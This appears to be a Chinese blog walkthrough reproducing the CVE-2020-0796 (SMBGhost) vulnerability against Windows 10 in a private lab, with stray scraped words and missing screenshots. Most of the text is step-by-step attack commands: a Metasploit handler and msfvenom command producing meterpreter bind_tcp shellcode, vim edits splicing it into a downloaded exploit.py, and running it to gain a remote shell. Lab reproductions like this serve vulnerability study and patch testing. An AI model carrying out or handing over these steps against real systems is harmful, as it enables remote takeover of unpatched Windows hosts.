CVE-2020-0796(永恒之黑)漏洞复现

1、影响范围(需关闭 Win10 防火墙):

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)


2、环境准备:

环境准备:python

  • kali,ip:192.168.201.152(攻击机)
  • 受影响版本的Win10,ip:192.168.201.132(须关闭防火墙)

漏洞检测工具下载地址:git

PoC下载地址:shell


3、漏洞复现:

一、先对使用 kali 对 9999 端口进行监听:tcp

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.201.132
run

在这里插入图片描述

二、kali 使用 msf 生成木马(此处端口需跟监听的端口是一致的)工具

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -b '\x00' -i 1 -f python>test.py

木马生成后的内容为:
在这里插入图片描述code

下载好的 POC:
在这里插入图片描述blog

三、先把木马的内的 buf 替换为 USER_PAYLOAD ,再替换 exploit.py 内的 USER_PAYLOAD 行的内容图片

  • :set nu   // 显示行
  • :91,127s/buf/USER_PAYLOAD   // 把91-127行的 buf 替换为 USER_PAYLOAD
    在这里插入图片描述

四、使用 Python3 运行(在此处需按一次回车)
在这里插入图片描述
在这里插入图片描述

五、此时监听的 9999 端口已收到访反弹的 shell

  • // 如未收到反弹的 Shell 则使用 Python 从新运行一次 POC

在这里插入图片描述
在这里插入图片描述

相关文章
相关标签/搜索